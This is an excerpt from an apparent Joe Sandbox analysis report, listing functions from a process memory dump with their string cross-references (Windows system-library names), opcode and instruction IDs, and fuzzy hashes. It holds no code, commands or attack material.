                                                                • Opcode ID: 580a454495d32028837294277d84315b666c8aee6ece49d7349485103fe67ad0
                                                                • Instruction ID: 14cbc70b0720ea374e8330efb172c6b5cb4a4fb43e1204db7bffe8db49416b2f
                                                                • Opcode Fuzzy Hash: 580a454495d32028837294277d84315b666c8aee6ece49d7349485103fe67ad0
                                                                • Instruction Fuzzy Hash: 67512871D0021EAEDF15DFA9CC90BEEBBB8EB54754F104529E611B7690DB309905CB60
                                                                Function 010E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • kLsE, xrefs: 010E0540
                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010E063D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                • API String ID: 0-2547482624
                                                                • Opcode ID: 5a70e0c8a20e6ecf260a977c1509f76dc0b5b2ee159460c9a022edcf2582b9d1
                                                                • Instruction ID: 86305eb6814813f4e4aa44e1c96393881c9adfb9d1bbc3fbf11faef3092ff0e5
                                                                • Opcode Fuzzy Hash: 5a70e0c8a20e6ecf260a977c1509f76dc0b5b2ee159460c9a022edcf2582b9d1
                                                                • Instruction Fuzzy Hash: 6851BE717007428FD728DF6AC4887A7BBE4AF88304F10883EE6E987245E7B09545CF92
                                                                Function 010EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 010EA2FB
                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 010EA309
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                • API String ID: 0-2876891731
                                                                • Opcode ID: 4fc8aeb33e9d6c3aac15a213f0122cde96bd5c0b0354beae8eec090483787a6e
                                                                • Instruction ID: 089f7903bf32b539f54d8d636933811fb152863c77de1f0eccd09eae85061d54
                                                                • Opcode Fuzzy Hash: 4fc8aeb33e9d6c3aac15a213f0122cde96bd5c0b0354beae8eec090483787a6e
                                                                • Instruction Fuzzy Hash: 1841AB31B00645DFDB25CF6AD844BAEBBF4BF88B10F1480A9E994DB291E3B5D940CB50
                                                                Function 0111A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Cleanup Group$Threadpool!
                                                                • API String ID: 2994545307-4008356553
                                                                • Opcode ID: e8936b38cb7a8e777a877ad2d6eb6f58d8130c2e89b6dd8807f9cf58fec4f82b
                                                                • Instruction ID: 284f00bb71c4f34069f0d07890761bea254aa22c4d8deb1cbe762520054a8f95
                                                                • Opcode Fuzzy Hash: e8936b38cb7a8e777a877ad2d6eb6f58d8130c2e89b6dd8807f9cf58fec4f82b
                                                                • Instruction Fuzzy Hash: 160144B2206740EFD315CF14DD45F16BBE8EB80729F008839E258CB180E330E800CB46
                                                                Function 010EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MUI
                                                                • API String ID: 0-1339004836
                                                                • Opcode ID: 5d8c1665f83fa52fc7fefa33b05c4859c4d52aa21f863d2aa9da891e4dd6c002
                                                                • Instruction ID: a8a1b794e1f6a0992df0c118552431446a3cee2b7d0b79136bd75b13090fbd8e
                                                                • Opcode Fuzzy Hash: 5d8c1665f83fa52fc7fefa33b05c4859c4d52aa21f863d2aa9da891e4dd6c002
                                                                • Instruction Fuzzy Hash: A0826D75E002198FEB64CFAAC988BEDBBF1FF44310F1481A9E999AB351D7319941CB50
                                                                Function 01166420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 59695963d90d6535fc20852d946f037a21a74320bb718e8717670b9f4d449629
                                                                • Instruction ID: 10b8350390994b620e83b591d38b261c5de79d6e017dc7e2f41e692c73a3b360
                                                                • Opcode Fuzzy Hash: 59695963d90d6535fc20852d946f037a21a74320bb718e8717670b9f4d449629
                                                                • Instruction Fuzzy Hash: F1918372900619AFEB29DF95DD85FEEBBB8EF18754F100025F600AB190D775AD10CBA0
                                                                Function 0118E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 72ce03d454f352bfd940c7b1a01f581ffc89f512daec5164d222c532ddb61aca
                                                                • Instruction ID: 3d862d0b4fc44682c7a91d89ddd68b8c78a1b6c7fa90b1466a6d562f77f6e534
                                                                • Opcode Fuzzy Hash: 72ce03d454f352bfd940c7b1a01f581ffc89f512daec5164d222c532ddb61aca
                                                                • Instruction Fuzzy Hash: 1F91BF31902609BEDB2AAFA5DC44FEFBBBAEF45754F014029F901A7250DB749901CF91
                                                                Function 0111A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GlobalTags
                                                                • API String ID: 0-1106856819
                                                                • Opcode ID: 8b9e2e006a9f9b18c84c27ee610b6b1043436533444fec34bc82259929850725
                                                                • Instruction ID: e2c0e4838393d0c454438c39dd224ec45387284f1c9bc927c6e67110fcf28f8f
                                                                • Opcode Fuzzy Hash: 8b9e2e006a9f9b18c84c27ee610b6b1043436533444fec34bc82259929850725
                                                                • Instruction Fuzzy Hash: 9E717CB5E0030ADFDF6CCF98D5906EDBBB2BF48710F54812AE915A7245EB709841CBA0
                                                                Function 01184978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .mui
                                                                • API String ID: 0-1199573805
                                                                • Opcode ID: 7e535ab776a4442ff578c9ceff998856645321655eefc6cb7a17d8de662b2454
                                                                • Instruction ID: 4ea714f0fa9b3f890056da60da048cd6731888955b624d337b71e730a9a9303b
                                                                • Opcode Fuzzy Hash: 7e535ab776a4442ff578c9ceff998856645321655eefc6cb7a17d8de662b2454
                                                                • Instruction Fuzzy Hash: E1518572D00627DBDF18EF99D840BEEFAB4AF14A54F058129E912BB650D7349801CFE4
                                                                Function 010FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: EXT-
                                                                • API String ID: 0-1948896318
                                                                • Opcode ID: be1edf2094d0af92b2f0285eb7999effde3ea8eb1c0f10f021749c1888062dfb
                                                                • Instruction ID: 03408baf51327244723184326e76513ecc0f13078b8bc915afba0c8fa186dcd0
                                                                • Opcode Fuzzy Hash: be1edf2094d0af92b2f0285eb7999effde3ea8eb1c0f10f021749c1888062dfb
                                                                • Instruction Fuzzy Hash: DD4190725083029BD710DA75C886BAFBBE8BF88B18F05096DF6C4E7590E774D904C796
                                                                Function 0115C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                • Opcode ID: b3c40667d3f04f2d5f003111c1bf2fdb9e56fbac0b3d70c81105604b1a2843f5
                                                                • Instruction ID: 82a1836f24bcb713d6bc7d35812d0898bfe4b5716ec96282444850a6f53d563b
                                                                • Opcode Fuzzy Hash: b3c40667d3f04f2d5f003111c1bf2fdb9e56fbac0b3d70c81105604b1a2843f5
                                                                • Instruction Fuzzy Hash: 6F4161B1D0022DEADB25DE50CC80FDEB77CAB55728F0045A5EA18AB140DB709E88CFE4
                                                                Function 01176B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #
                                                                • API String ID: 0-1885708031
                                                                • Opcode ID: 3b63b3d3b5dd4699fa4deca9ff944663e1d9dabef33bf196c60506e669296147
                                                                • Instruction ID: 020e7b2cfd585b333f6bdd2bd15ef87610cd260e915b54c2d29f0ec1e2d37092
                                                                • Opcode Fuzzy Hash: 3b63b3d3b5dd4699fa4deca9ff944663e1d9dabef33bf196c60506e669296147
                                                                • Instruction Fuzzy Hash: C7313731E00B199BFB2ACF69C850BEE7BB8DF05704F244028EA51AB382DB75D945CB50
                                                                Function 0115CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryName
                                                                • API String ID: 0-215506332
                                                                • Opcode ID: 337ab8e57ffa7db41529034038fe5349a13bd9352674f6d00455459f6e94aa43
                                                                • Instruction ID: 9ee43de7ff0dbc6be5dbd944924c24c91d640d3c6ea95bcef30bace63b0cedb3
                                                                • Opcode Fuzzy Hash: 337ab8e57ffa7db41529034038fe5349a13bd9352674f6d00455459f6e94aa43
                                                                • Instruction Fuzzy Hash: 47310536900619EFEB19DF58C851FAFBB78EB807A0F014129ED21A7250D7309E00DBE0
                                                                Function 0116892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0116895E
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                • API String ID: 0-702105204
                                                                • Opcode ID: 9b3af302c94970a75dff370c6dca8dac8d5fc008e40342ad187490c2903e4d06
                                                                • Instruction ID: ee17b01268b4a36a64c7192d1e45cda33b85c3c30d1f8c5fead2efb622756397
                                                                • Opcode Fuzzy Hash: 9b3af302c94970a75dff370c6dca8dac8d5fc008e40342ad187490c2903e4d06
                                                                • Instruction Fuzzy Hash: 04017B31211306DFEB3C5B1ACD84B9ABF7DEFC1298B04002CF68106111DB2268A4C792
                                                                Function 01182000 Relevance: .8, Instructions: 757COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50fe5dd745c4225dab7d0586e0955e6f39b4397384b864198c5023d4ca3f2836
                                                                • Instruction ID: c3460158661973a09408b0c93c4913600a167f6e1a80cc156f10ec78276ad572
                                                                • Opcode Fuzzy Hash: 50fe5dd745c4225dab7d0586e0955e6f39b4397384b864198c5023d4ca3f2836
                                                                • Instruction Fuzzy Hash: 3042D6356083419FDB2EEF68C890A6BBBE5BF99304F54892DFA8287250D770D845CF52
                                                                Function 01178158 Relevance: .6, Instructions: 617COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1b876a5cf0357f86b0c7d864f15b323aa0158c31508266b8f8440d482cbefcd
                                                                • Instruction ID: fee823439d0f6d665bede57efbfbe5e573f9a73afee0b4458aca323c9cd7c1ec
                                                                • Opcode Fuzzy Hash: e1b876a5cf0357f86b0c7d864f15b323aa0158c31508266b8f8440d482cbefcd
                                                                • Instruction Fuzzy Hash: 6A426D75E002199FEB29CF69C885BADBBF5BF88304F158099E949EB341D7349981CF60
                                                                Function 010F2840 Relevance: .6, Instructions: 605COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da20a92ed70a83aa8ebf23eddc5f448003257d622d0d9e24a96ee35e48892b07
                                                                • Instruction ID: 51dae66eb5e0b2ba5871f81bf030ca3dea3afd84f5e79ea6168f7d993e11184f
                                                                • Opcode Fuzzy Hash: da20a92ed70a83aa8ebf23eddc5f448003257d622d0d9e24a96ee35e48892b07
                                                                • Instruction Fuzzy Hash: 98320F70A007568FEB2DCF69C8447BEBBF2BF86B08F14412DD5869B684D734A842CB50
                                                                Function 0118A118 Relevance: .6, Instructions: 591COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84da85dabc71a611e1a464887875d2c9497d64c661c653a1a97cff9b93d6728a
                                                                • Instruction ID: c7f50f66b4c64a7dd487fdd15ddf587cc7fffc7c00c1795c43779929bf80d51c
                                                                • Opcode Fuzzy Hash: 84da85dabc71a611e1a464887875d2c9497d64c661c653a1a97cff9b93d6728a
                                                                • Instruction Fuzzy Hash: 4222B2742046518BEB2DEF2DE050372BBF1AF44304F19C45BEA968B286E375E492DF61
                                                                Function 010E6A50 Relevance: .5, Instructions: 548COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a109e117b909f44da7297aee69e1e49cec765c5919c24bd3ddbfee693f79c43
                                                                • Instruction ID: b734074500a6619d842463ed9e241103696555128bdbc059d6026a102435e595
                                                                • Opcode Fuzzy Hash: 6a109e117b909f44da7297aee69e1e49cec765c5919c24bd3ddbfee693f79c43
                                                                • Instruction Fuzzy Hash: F632EF70A04205DFDB29CFA9D484BAEBBF1FF58310F148569E996AB391D731E881CB50
                                                                Function 01104A35 Relevance: .4, Instructions: 423COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction ID: 25369fb816b45c7d971c3f008c6e69c426efd1bf398269633e52f78a4736d0f1
                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction Fuzzy Hash: 64F18071E0061A9BDF1ECF99C580BAEBBF5BF48714F058129EA05AB780E7B4D841CB54
                                                                Function 0117892B Relevance: .4, Instructions: 386COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 873b6177fc1aa17c3c4fe36af75045568273dc89001128bd89cc0b7d86fa18ee
                                                                • Instruction ID: 25b47ed6982770f4a5b0a5379b91350cd690185bb1f333f9f9d120783ca8eb20
                                                                • Opcode Fuzzy Hash: 873b6177fc1aa17c3c4fe36af75045568273dc89001128bd89cc0b7d86fa18ee
                                                                • Instruction Fuzzy Hash: 16D1EF71E0060A8BDF0DCF69C845AFEBBF1AF88314F198169D955A7381E735EA05CB60
                                                                Function 010E65D0 Relevance: .4, Instructions: 383COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75af5aa912c58f00829e9548c709cd3b3f0c7f0382d73437d0b101731f8fa9a2
                                                                • Instruction ID: ac5ba7070b81095188aab3054dc86213748c9b980cd5010d8d665ff8ac1fd6ca
                                                                • Opcode Fuzzy Hash: 75af5aa912c58f00829e9548c709cd3b3f0c7f0382d73437d0b101731f8fa9a2
                                                                • Instruction Fuzzy Hash: 9BE1CF71608342CFC715CF29D084A6ABBE0FF99314F058A6DE9D987351EB32E905CB92
                                                                Function 010D8397 Relevance: .4, Instructions: 380COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ea855052a9ddb49d7a6aec37d23455c237a52801d0ada71a9615b6a3a2315857
                                                                • Instruction ID: 637cfa993cfe1475b13ec64cb7c548328913c82eb8f42eede0f1e2cbcfbf4ece
                                                                • Opcode Fuzzy Hash: ea855052a9ddb49d7a6aec37d23455c237a52801d0ada71a9615b6a3a2315857
                                                                • Instruction Fuzzy Hash: D6D1D0B1A003069BDB18DF29C881ABE77F5BF94314F05822EE995DB285FB30D954CB50
                                                                Function 01168243 Relevance: .3, Instructions: 322COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction ID: d1ce132a479afe94aafe6c86d30d5795d8b007000b198e10e8a802451a35e44e
                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction Fuzzy Hash: 5BB17075A00705AFDF28DF99C940AAFBBBDBF84308F14446DAA4297790DB36E915CB10
                                                                Function 010F0535 Relevance: .3, Instructions: 300COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction ID: db729d183cb6381ffab896b57ed24eed6adfd732afc0a61c75d29400fff67146
                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction Fuzzy Hash: C9B12631600646AFDB29DB68C851BBFBBF7AF44704F140199E692DB686D730ED41CB90
                                                                Function 010E83C0 Relevance: .3, Instructions: 281COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c5a26afd12add78ea978b9f38e0e953272dbb1ca63a749970092db15a9a0a2f5
                                                                • Instruction ID: 4ba78261bee20294434542f2b2e50484ceb0435b61a7805eeb36700c25c7390b
                                                                • Opcode Fuzzy Hash: c5a26afd12add78ea978b9f38e0e953272dbb1ca63a749970092db15a9a0a2f5
                                                                • Instruction Fuzzy Hash: ADC18875108341DFE764CF19C488BAAB7E4FF88704F44896EE98987291DB74E948CF92
                                                                Function 010DC427 Relevance: .3, Instructions: 280COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a2a35784a2085b6cb94bb81692a78e6d5c195aef60190d44bb72e934f8188d30
                                                                • Instruction ID: d82b788232f617d5695d9c30be8163432a2a9be5292a2655c4ae4b9ec99a3d93
                                                                • Opcode Fuzzy Hash: a2a35784a2085b6cb94bb81692a78e6d5c195aef60190d44bb72e934f8188d30
                                                                • Instruction Fuzzy Hash: 30B18070A002668BEB68CF58C980BADB7F1EF44704F4485EDD58AE7285EB709DC5CB20
                                                                Function 0110E5E7 Relevance: .3, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9012860a16823e41d3a5a216f7d30ca088d23dea15eeb69bc78bde72991139b2
                                                                • Instruction ID: 2ea20a3c99e431c215c9b3e28d07c1e3d4e8d79011760504eb09a3c9c8f6d122
                                                                • Opcode Fuzzy Hash: 9012860a16823e41d3a5a216f7d30ca088d23dea15eeb69bc78bde72991139b2
                                                                • Instruction Fuzzy Hash: ADA13831E026169FEB2EDB5DD844FAEBBB4AB00B14F050525EA10AB3D1D7B49D41CBD1
                                                                Function 01120185 Relevance: .3, Instructions: 276COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0a760ac204efd0652ab3f938020ee2239253b3a2a408a5404f94a4aeb566112c
                                                                • Instruction ID: 278efa1792bbdc188248cbf511ced08c83cc54764250cdf731b1561e88cdeb3a
                                                                • Opcode Fuzzy Hash: 0a760ac204efd0652ab3f938020ee2239253b3a2a408a5404f94a4aeb566112c
                                                                • Instruction Fuzzy Hash: E6A1F570B0162ADFDB2DDF69C590BAAB7B1FF48318F004229EA55D7281DB34E825CB51
                                                                Function 011B4500 Relevance: .3, Instructions: 275COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 798b7ae488d8828054f1185613ea0941401d548ccb1b781b6d8e68c7994e3c3c
                                                                • Instruction ID: 69fee6b88cb5f577483dac3c997aafd4ca855f6f24810f24e2f6b3af11e14780
                                                                • Opcode Fuzzy Hash: 798b7ae488d8828054f1185613ea0941401d548ccb1b781b6d8e68c7994e3c3c
                                                                • Instruction Fuzzy Hash: FBA1D072A056129FD719DF58C980BAAB7E9FF48704F05852CE6869BA52C334EC40CB91
                                                                Function 011B2B57 Relevance: .3, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                • Instruction ID: 413ef52d646ed59f16a08e474c665d16af921ad2ed8e578f0676c1f7302ca2ce
                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                • Instruction Fuzzy Hash: 98B12771E0061ADFDF29CFA9C880AEDBBB5FF48310F148169E915AB354D730A949CB90
                                                                Function 011660E0 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
